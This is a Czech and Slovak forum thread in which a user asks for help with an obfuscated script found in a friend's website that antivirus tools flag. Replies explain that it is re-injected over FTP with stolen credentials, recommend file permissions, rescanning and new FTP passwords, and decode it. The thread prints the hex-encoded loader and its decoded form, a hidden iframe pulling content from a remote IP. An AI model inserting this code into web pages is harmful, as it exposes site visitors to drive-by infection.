Autor Zpráva
BlackMartin
Profil
Dobrý den.
Můj klamarád který weby píše jen v HTML + CSS tak mi dneska napsal že mu jeho antivir ( cituji: NOD, Kaspersky a AVG to hlásí. ).
Při prohledávání zdrojáku jsem nic zvláštního nenašel, ale jen mě zarazilo toto
<script>function v47662812bffc3(v47662812c03bd){ function v47662812c07b7 () {var v47662812c0bb2=16; return v47662812c0bb2;} return(parseInt(v47662812c03bd,v47662812c07b7()));}function v47662812c0fb0(v47662812c13ab){ var v47662812c1fb7=2; var v47662812c17aa='';for(v47662812c1ba3=0; v47662812c1ba3<v47662812c13ab.length; v47662812c1ba3+=v47662812c1fb7){ v47662812c17aa+=(String.fromCharCode(v47662812bffc3(v47662812c13ab.sub str(v47662812c1ba3,  v47662812c1fb7))));}return v47662812c17aa;} document.write(v47662812c0fb0('3C5343524950543E77696E646F772E737461747  5733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E6 16D653D326633343363207372633D5C27687474703A2F2F37372E3232312E3133332E3 138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E726 16E646F6D28292A3336343530292B2764323231663763345C272077696474683D34353 0206865696768743D3831207374796C653D5C27646973706C61793A206E6F6E655C273 E3C2F696672616D653E27293C2F5343524950543E'));</script>


Při odmazání toho scriptu se tam znovu objeví (cituji: a když to smažeš tak se to vytvoří znova ).
V JS se moc nevyznám tak Vás prosím jestli byste mi to nepomohli rozluštit.
Děkuju moc všem.
tiso
Profil
Šíri sa to, tiež som to mal... Ten skript sa tam dopisuje cez ftp, takže odniekiaľ má prihlasovacie údaje na ftp. Vytváraniu zabrániš zmenou práv na 444 pri súboroch s názvom index, main a možno pár ďalších názvov. Ale to nerieši hlavný problém, treba preskenovať počítač a zmeniť prihlasovacie údaje na ftp.
peta
Profil
BlackMartin
kdyz to das vepsat do textarea, pak to vypada takto:
<SCRIPT>window.status='Done';document.write('<iframe name=2f343c src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*364 50)+'d221f7c4\' width=450 height=81 style=\'display: none\'></iframe>')</SCRIPT>

Takze krome nastaveni prav k souboru (linux), viz tiso, pripadne misto souboru vytvoreni adresare (windows), bych mozna jeste zablokoval urcitou IP.

Jinak ty antiviry je nutne poustet v nouzovem rezimu, pripadne nahrat jeste neco jako Personal SE z lavasoft.com. V nouzovem rezimu se nespousti divoke programy, tudiz antiviru neblokuji praci s odvirovanim.

Otazkou je, do jake miry to odvirovava a neproskenovava disk za ucelem odeslani zajimavych souboru tvurci programu? Toto odesilani nazveme update antiviru :)

Vaše odpověď

Mohlo by se hodit

Neumíte-li správně určit příčinu chyby, vkládejte odkazy na živé ukázky.
Užíváte-li nějakou cizí knihovnu, ukažte odpovídajícím, kde jste ji vzali.

Užitečné odkazy:

Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: